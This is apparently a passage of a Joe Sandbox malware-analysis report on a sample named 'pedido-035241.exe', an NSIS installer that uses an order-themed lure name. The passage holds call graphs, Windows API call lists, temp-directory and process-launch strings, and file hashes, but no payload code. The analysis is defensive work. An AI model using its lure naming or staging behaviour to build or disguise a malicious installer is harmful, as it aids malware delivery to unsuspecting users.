calls 4603->4604 4605 401f18 4604->4605 4606 402da6 17 API calls 4605->4606 4607 401f21 4606->4607 4608 402da6 17 API calls 4607->4608 4609 401f2a 4608->4609 4610 402da6 17 API calls 4609->4610 4611 401f33 4610->4611 4612 401423 24 API calls 4611->4612 4613 401f3a 4612->4613 4620 405b2d ShellExecuteExW 4613->4620 4615 401f82 4616 40292e 4615->4616 4617 40697f 5 API calls 4615->4617 4618 401f9f CloseHandle 4617->4618 4618->4616 4620->4615 4621 402f93 4622 402fa5 SetTimer 4621->4622 4623 402fbe 4621->4623 4622->4623 4624 403013 4623->4624 4625 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4623->4625 4625->4624 4626 401d17 4627 402d84 17 API calls 4626->4627 4628 401d1d IsWindow 4627->4628 4629 401a20 4628->4629 4630 404599 lstrcpynW lstrlenW 4014 401b9b 4015 401bec 4014->4015 4020 401ba8 4014->4020 4016 401c16 GlobalAlloc 4015->4016 4017 401bf1 4015->4017 4018 406544 17 API calls 4016->4018 4027 40239d 4017->4027 4035 406507 lstrcpynW 4017->4035 4022 401c31 4018->4022 4019 406544 17 API calls 4023 402397 4019->4023 4020->4022 4024 401bbf 4020->4024 4022->4019 4022->4027 4028 405b67 MessageBoxIndirectW 4023->4028 4033 406507 lstrcpynW 4024->4033 4025 401c03 GlobalFree 4025->4027 4028->4027 4029 401bce 4034 406507 lstrcpynW 4029->4034 4031 401bdd 4036 406507 lstrcpynW 4031->4036 4033->4029 4034->4031 4035->4025 4036->4027 4631 40261c 4632 402da6 17 API calls 4631->4632 4633 402623 4632->4633 4636 405ff7 GetFileAttributesW CreateFileW 4633->4636 4635 40262f 4636->4635 4051 40259e 4062 402de6 4051->4062 4054 402d84 17 API calls 4055 4025b1 4054->4055 4056 4025d9 RegEnumValueW 4055->4056 4057 4025cd RegEnumKeyW 4055->4057 4060 40292e 4055->4060 4058 4025f5 RegCloseKey 4056->4058 4059 4025ee 4056->4059 4057->4058 4058->4060 4059->4058 4063 402da6 17 API calls 4062->4063 4064 402dfd 4063->4064 4065 406374 RegOpenKeyExW 4064->4065 4066 4025a8 4065->4066 4066->4054 4644 40149e 4645 4014ac PostQuitMessage 4644->4645 4646 40239d 4644->4646 4645->4646 4647 404622 4648 40463a 4647->4648 4655 404754 4647->4655 4652 404463 18 API calls 4648->4652 4649 4047be 4650 404888 4649->4650 4651 4047c8 GetDlgItem 4649->4651 4658 4044ca 8 API calls 4650->4658 4653 4047e2 4651->4653 4654 404849 4651->4654 4657 4046a1 4652->4657 4653->4654 4662 404808 SendMessageW LoadCursorW SetCursor 4653->4662 4654->4650 4663 40485b 4654->4663 4655->4649 4655->4650 4656 40478f GetDlgItem SendMessageW 4655->4656 4680 404485 KiUserCallbackDispatcher 4656->4680 4660 404463 18 API calls 4657->4660 4661 404883 4658->4661 4665 4046ae CheckDlgButton 4660->4665 4681 4048d1 4662->4681 4667 404871 4663->4667 4668 404861 SendMessageW 4663->4668 4664 4047b9 4670 4048ad SendMessageW 4664->4670 4678 404485 KiUserCallbackDispatcher 4665->4678 4667->4661 4669 404877 SendMessageW 4667->4669 4668->4667 4669->4661 4670->4649 4673 4046cc GetDlgItem 4679 404498 SendMessageW 4673->4679 4675 4046e2 SendMessageW 4676 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4675->4676 4677 4046ff GetSysColor 4675->4677 4676->4661 4677->4676 4678->4673 4679->4675 4680->4664 4684 405b2d ShellExecuteExW 4681->4684 4683 404837 LoadCursorW SetCursor 4683->4654 4684->4683 3443 4015a3 3444 402da6 17 API calls 3443->3444 3445 4015aa SetFileAttributesW 3444->3445 3446 4015bc 3445->3446 3556 401fa4 3557 402da6 17 API calls 3556->3557 3558 401faa 3557->3558 3559 405569 24 API calls 3558->3559 3560 401fb4 3559->3560 3571 405aea CreateProcessW 3560->3571 3565 401fcf 3567 401fd4 3565->3567 3568 401fdf 3565->3568 3566 40292e 3579 40644e wsprintfW 3567->3579 3570 401fdd CloseHandle 3568->3570 3570->3566 3572 401fba 3571->3572 3573 405b1d CloseHandle 3571->3573 3572->3566 3572->3570 3574 40697f WaitForSingleObject 3572->3574 3573->3572 3575 406999 3574->3575 3576 4069ab GetExitCodeProcess 3575->3576 3580 406910 3575->3580 3576->3565 3579->3570 3581 40692d PeekMessageW 3580->3581 3582 406923 DispatchMessageW 3581->3582 3583 40693d WaitForSingleObject 3581->3583 3582->3581 3583->3575 3584 4056a8 3585 405852 3584->3585 3586 4056c9 GetDlgItem GetDlgItem GetDlgItem 3584->3586 3588 405883 3585->3588 3589 40585b GetDlgItem CreateThread CloseHandle 3585->3589 3629 404498 SendMessageW 3586->3629 3591 4058ae 3588->3591 3593 4058d3 3588->3593 3594 40589a ShowWindow ShowWindow 3588->3594 3589->3588 3632 40563c OleInitialize 3589->3632 3590 405739 3598 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3590->3598 3592 40590e 3591->3592 3595 4058c2 3591->3595 3596 4058e8 ShowWindow 3591->3596 3592->3593 3606 40591c SendMessageW 3592->3606 3597 4044ca 8 API calls 3593->3597 3631 404498 SendMessageW 3594->3631 3600 40443c SendMessageW 3595->3600 3602 405908 3596->3602 3603 4058fa 3596->3603 3601 4058e1 3597->3601 3604 405792 SendMessageW SendMessageW 3598->3604 3605 4057ae 3598->3605 3600->3593 3608 40443c SendMessageW 3602->3608 3607 405569 24 API calls 3603->3607 3604->3605 3609 4057c1 3605->3609 3610 4057b3 SendMessageW 3605->3610 3606->3601 3611 405935 CreatePopupMenu 3606->3611 3607->3602 3608->3592 3612 404463 18 API calls 3609->3612 3610->3609 3613 406544 17 API calls 3611->3613 3615 4057d1 3612->3615 3614 405945 AppendMenuW 3613->3614 3616 405962 GetWindowRect 3614->3616 3617 405975 TrackPopupMenu 3614->3617 3618 4057da ShowWindow 3615->3618 3619 40580e GetDlgItem SendMessageW 3615->3619 3616->3617 3617->3601 3620 405990 3617->3620 3621 4057f0 ShowWindow 3618->3621 3622 4057fd 3618->3622 3619->3601 3623 405835 SendMessageW SendMessageW 3619->3623 3624 4059ac SendMessageW 3620->3624 3621->3622 3630 404498 SendMessageW 3622->3630 3623->3601 3624->3624 3625 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3624->3625 3627 4059ee SendMessageW 3625->3627 3627->3627 3628 405a17 GlobalUnlock SetClipboardData CloseClipboard 3627->3628 3628->3601 3629->3590 3630->3619 3631->3591 3633 4044af SendMessageW 3632->3633 3634 40565f 3633->3634 3637 401389 2 API calls 3634->3637 3638 405686 3634->3638 3635 4044af SendMessageW 3636 405698 CoUninitialize 3635->3636 3637->3634 3638->3635 4685 40202a 4686 402da6 17 API calls 4685->4686 4687 402031 4686->4687 4688 4068d4 5 API calls 4687->4688 4689 402040 4688->4689 4690 4020cc 4689->4690 4691 40205c GlobalAlloc 4689->4691 4691->4690 4692 402070 4691->4692 4693 4068d4 5 API calls 4692->4693 4694 402077 4693->4694 4695 4068d4 5 API calls 4694->4695 4696 402081 4695->4696 4696->4690 4700 40644e wsprintfW 4696->4700 4698 4020ba 4701 40644e wsprintfW 4698->4701 4700->4698 4701->4690 4702 40252a 4703 402de6 17 API calls 4702->4703 4704 402534 4703->4704 4705 402da6 17 API calls 4704->4705 4706 40253d 4705->4706 4707 402548 RegQueryValueExW 4706->4707 4709 40292e 4706->4709 4708 402568 4707->4708 4710 40256e RegCloseKey 4707->4710 4708->4710 4713 40644e wsprintfW 4708->4713 4710->4709 4713->4710 4714 404caa 4715 404cd6 4714->4715 4716 404cba 4714->4716 4718 404d09 4715->4718 4719 404cdc SHGetPathFromIDListW 4715->4719 4725 405b4b GetDlgItemTextW 4716->4725 4721 404cec 4719->4721 4724 404cf3 SendMessageW 4719->4724 4720 404cc7 SendMessageW 4720->4715 4722 40140b 2 API calls 4721->4722 4722->4724 4724->4718 4725->4720 4726 4021aa 4727 402da6 17 API calls 4726->4727 4728 4021b1 4727->4728 4729 402da6 17 API calls 4728->4729 4730 4021bb 4729->4730 4731 402da6 17 API calls 4730->4731 4732 4021c5 4731->4732 4733 402da6 17 API calls 4732->4733 4734 4021cf 4733->4734 4735 402da6 17 API calls 4734->4735 4736 4021d9 4735->4736 4737 402218 CoCreateInstance 4736->4737 4738 402da6 17 API calls 4736->4738 4741 402237 4737->4741 4738->4737 4739 401423 24 API calls 4740 4022f6 4739->4740 4741->4739 4741->4740 4742 401a30 4743 402da6 17 API calls 4742->4743 4744 401a39 ExpandEnvironmentStringsW 4743->4744 4745 401a4d 4744->4745 4747 401a60 4744->4747 4746 401a52 lstrcmpW 4745->4746 4745->4747 4746->4747 3744 4023b2 3745 4023c0 3744->3745 3746 4023ba 3744->3746 3748 402da6 17 API calls 3745->3748 3750 4023ce 3745->3750 3747 402da6 17 API calls 3746->3747 3747->3745 3748->3750 3749 402da6 17 API calls 3753 4023e5 WritePrivateProfileStringW 3749->3753 3751 402da6 17 API calls 3750->3751 3752 4023dc 3750->3752 3751->3752 3752->3749 4760 402434 4761 402467 4760->4761 4762 40243c 4760->4762 4763 402da6 17 API calls 4761->4763 4764 402de6 17 API calls 4762->4764 4765 40246e 4763->4765 4766 402443 4764->4766 4771 402e64 4765->4771 4768 402da6 17 API calls 4766->4768 4770 40247b 4766->4770 4769 402454 RegDeleteValueW RegCloseKey 4768->4769 4769->4770 4772 402e78 4771->4772 4774 402e71 4771->4774 4772->4774 4775 402ea9 4772->4775 4774->4770 4776 406374 RegOpenKeyExW 4775->4776 4777 402ed7 4776->4777 4778 402ee7 RegEnumValueW 4777->4778 4779 402f0a 4777->4779 4786 402f81 4777->4786 4778->4779 4780 402f71 RegCloseKey 4778->4780 4779->4780 4781 402f46 RegEnumKeyW 4779->4781 4782 402f4f RegCloseKey 4779->4782 4784 402ea9 6 API calls 4779->4784 4780->4786 4781->4779 4781->4782 4783 4068d4 5 API calls 4782->4783 4785 402f5f 4783->4785 4784->4779 4785->4786 4787 402f63 RegDeleteKeyW 4785->4787 4786->4774 4787->4786 4795 401735 4796 402da6 17 API calls 4795->4796 4797 40173c SearchPathW 4796->4797 4798 401757 4797->4798 4799 401d38 4800 402d84 17 API calls 4799->4800 4801 401d3f 4800->4801 4802 402d84 17 API calls 4801->4802 4803 401d4b GetDlgItem 4802->4803 4804 402638 4803->4804 4805 4014b8 4806 4014be 4805->4806 4807 401389 2 API calls 4806->4807 4808 4014c6 4807->4808 4816 40263e 4817 402652 4816->4817 4818 40266d 4816->4818 4821 402d84 17 API calls 4817->4821 4819 402672 4818->4819 4820 40269d 4818->4820 4822 402da6 17 API calls 4819->4822 4823 402da6 17 API calls 4820->4823 4828 402659 4821->4828 4824 402679 4822->4824 4825 4026a4 lstrlenW 4823->4825 4833 406529 WideCharToMultiByte 4824->4833 4825->4828 4827 40268d lstrlenA 4827->4828 4829 4026e7 4828->4829 4830 4026d1 4828->4830 4832 4060d8 5 API calls 4828->4832 4830->4829 4831 4060a9 WriteFile 4830->4831 4831->4829 4832->4830 4833->4827

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 004034F7 Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450stringfilecomCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 4034f7-403547 SetErrorMode GetVersionExW 1 403581-403588 0->1 2 403549-40357d GetVersionExW 0->2 3 403592-4035d2 1->3 4 40358a 1->4 2->1 5 4035d4-4035dc call 4068d4 3->5 6 4035e5 3->6 4->3 5->6 11 4035de 5->11 8 4035ea-4035fe call 406864 lstrlenA 6->8 13 403600-40361c call 4068d4 * 3 8->13 11->6 20 40362d-40368f #17 OleInitialize SHGetFileInfoW call 406507 GetCommandLineW call 406507 13->20 21 40361e-403624 13->21 28 403691-403693 20->28 29 403698-4036ab call 405e03 CharNextW 20->29 21->20 25 403626 21->25 25->20 28->29 32 4037a2-4037a8 29->32 33 4036b0-4036b6 32->33 34 4037ae 32->34 35 4036b8-4036bd 33->35 36 4036bf-4036c5 33->36 37 4037c2-4037dc GetTempPathW call 4034c6 34->37 35->35 35->36 38 4036c7-4036cb 36->38 39 4036cc-4036d0 36->39 47 403834-40384c DeleteFileW call 40307d 37->47 48 4037de-4037fc GetWindowsDirectoryW lstrcatW call 4034c6 37->48 38->39 41 403790-40379e call 405e03 39->41 42 4036d6-4036dc 39->42 41->32 59 4037a0-4037a1 41->59 45 4036f6-40372f 42->45 46 4036de-4036e5 42->46 53 403731-403736 45->53 54 40374b-403785 45->54 51 4036e7-4036ea 46->51 52 4036ec 46->52 64 403852-403858 47->64 65 403a23-403a31 call 403adc OleUninitialize 47->65 48->47 62 4037fe-40382e GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034c6 48->62 51->45 51->52 52->45 53->54 61 403738-403740 53->61 57 403787-40378b 54->57 58 40378d-40378f 54->58 57->58 63 4037b0-4037bd call 406507 57->63 58->41 59->32 66 403742-403745 61->66 67 403747 61->67 62->47 62->65 63->37 69 40385e-403871 call 405e03 64->69 70 4038ff-403906 call 403bb6 64->70 77 403a33-403a42 call 405b67 ExitProcess 65->77 78 403a48-403a4e 65->78 66->54 66->67 67->54 84 4038c3-4038d0 69->84 85 403873-4038a8 69->85 80 40390b-40390e 70->80 82 403a50-403a65 GetCurrentProcess OpenProcessToken 78->82 83 403ac6-403ace 78->83 80->65 91 403a96-403aa4 call 4068d4 82->91 92 403a67-403a90 LookupPrivilegeValueW AdjustTokenPrivileges 82->92 86 403ad0 83->86 87 403ad3-403ad6 ExitProcess 83->87 88 4038d2-4038e0 call 405ede 84->88 89 403913-403927 call 405ad2 lstrcatW 84->89 93 4038aa-4038ae 85->93 86->87 88->65 103 4038e6-4038fc call 406507 * 2 88->103 106 403934-40394e lstrcatW lstrcmpiW 89->106 107 403929-40392f lstrcatW 89->107 104 403ab2-403abd ExitWindowsEx 91->104 105 403aa6-403ab0 91->105 92->91 97 4038b0-4038b5 93->97 98 4038b7-4038bf 93->98 97->98 102 4038c1 97->102 98->93 98->102 102->84 103->70 104->83 111 403abf-403ac1 call 40140b 104->111 105->104 105->111 108 403a21 106->108 109 403954-403957 106->109 107->106 108->65 112 403960 call 405ab5 109->112 113 403959-40395e call 405a38 109->113 111->83 121 403965-403975 SetCurrentDirectoryW 112->121 113->121 123 403982-4039ae call 406507 121->123 124 403977-40397d call 406507 121->124 128 4039b3-4039ce call 406544 DeleteFileW 123->128 124->123 131 4039d0-4039e0 CopyFileW 128->131 132 403a0e-403a18 128->132 131->132 133 4039e2-403a02 call 4062c7 call 406544 call 405aea 131->133 132->128 134 403a1a-403a1c call 4062c7 132->134 133->132 142 403a04-403a0b CloseHandle 133->142 134->108 142->132
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 0040351A
                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00403543
                                                                                                                                                                            • GetVersionExW.KERNEL32(0000011C), ref: 0040355A
                                                                                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
                                                                                                                                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403634
                                                                                                                                                                            • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
                                                                                                                                                                            • GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
                                                                                                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\pedido-035241.exe",00000020,"C:\Users\user\Desktop\pedido-035241.exe",00000000), ref: 004036A0
                                                                                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
                                                                                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
                                                                                                                                                                            • DeleteFileW.KERNELBASE(1033), ref: 00403839
                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pedido-035241.exe",00000000,?), ref: 00403920
                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pedido-035241.exe",00000000,?), ref: 0040392F
                                                                                                                                                                              • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pedido-035241.exe",00000000,?), ref: 0040393A
                                                                                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pedido-035241.exe",00000000,?), ref: 00403946
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
                                                                                                                                                                            • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
                                                                                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\pedido-035241.exe,00420EC8,00000001), ref: 004039D8
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
                                                                                                                                                                            • OleUninitialize.OLE32(?), ref: 00403A28
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403A42
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403AD6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                            • String ID: "C:\Users\user\Desktop\pedido-035241.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene$C:\Users\user\Desktop$C:\Users\user\Desktop\pedido-035241.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                            • API String ID: 3859024572-665511647
                                                                                                                                                                            • Opcode ID: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
                                                                                                                                                                            • Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
                                                                                                                                                                            • Opcode Fuzzy Hash: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
                                                                                                                                                                            • Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D
                                                                                                                                                                            Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 143 4056a8-4056c3 144 405852-405859 143->144 145 4056c9-405790 GetDlgItem * 3 call 404498 call 404df1 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405883-405890 144->147 148 40585b-40587d GetDlgItem CreateThread CloseHandle 144->148 167 405792-4057ac SendMessageW * 2 145->167 168 4057ae-4057b1 145->168 150 405892-405898 147->150 151 4058ae-4058b8 147->151 148->147 155 4058d3-4058dc call 4044ca 150->155 156 40589a-4058a9 ShowWindow * 2 call 404498 150->156 152 4058ba-4058c0 151->152 153 40590e-405912 151->153 157 4058c2-4058ce call 40443c 152->157 158 4058e8-4058f8 ShowWindow 152->158 153->155 161 405914-40591a 153->161 164 4058e1-4058e5 155->164 156->151 157->155 165 405908-405909 call 40443c 158->165 166 4058fa-405903 call 405569 158->166 161->155 169 40591c-40592f SendMessageW 161->169 165->153 166->165 167->168 172 4057c1-4057d8 call 404463 168->172 173 4057b3-4057bf SendMessageW 168->173 174 405a31-405a33 169->174 175 405935-405960 CreatePopupMenu call 406544 AppendMenuW 169->175 182 4057da-4057ee ShowWindow 172->182 183 40580e-40582f GetDlgItem SendMessageW 172->183 173->172 174->164 180 405962-405972 GetWindowRect 175->180 181 405975-40598a TrackPopupMenu 175->181 180->181 181->174 184 405990-4059a7 181->184 185 4057f0-4057fb ShowWindow 182->185 186 4057fd 182->186 183->174 187 405835-40584d SendMessageW * 2 183->187 188 4059ac-4059c7 SendMessageW 184->188 189 405803-405809 call 404498 185->189 186->189 187->174 188->188 190 4059c9-4059ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 4059ee-405a15 SendMessageW 190->192 192->192 193 405a17-405a2b GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405706
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405715
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00405752
                                                                                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405759
                                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004057F5
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405816
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405724
                                                                                                                                                                              • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405868
                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_0000563C,00000000), ref: 00405876
                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 0040587D
                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 004058A1
                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004058A6
                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 004058F0
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00405935
                                                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405969
                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 004059CA
                                                                                                                                                                            • EmptyClipboard.USER32 ref: 004059D0
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004059E6
                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
                                                                                                                                                                            • CloseClipboard.USER32 ref: 00405A2B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                            • String ID: {
                                                                                                                                                                            • API String ID: 590372296-366298937
                                                                                                                                                                            • Opcode ID: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
                                                                                                                                                                            • Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
                                                                                                                                                                            • Opcode Fuzzy Hash: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
                                                                                                                                                                            • Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68
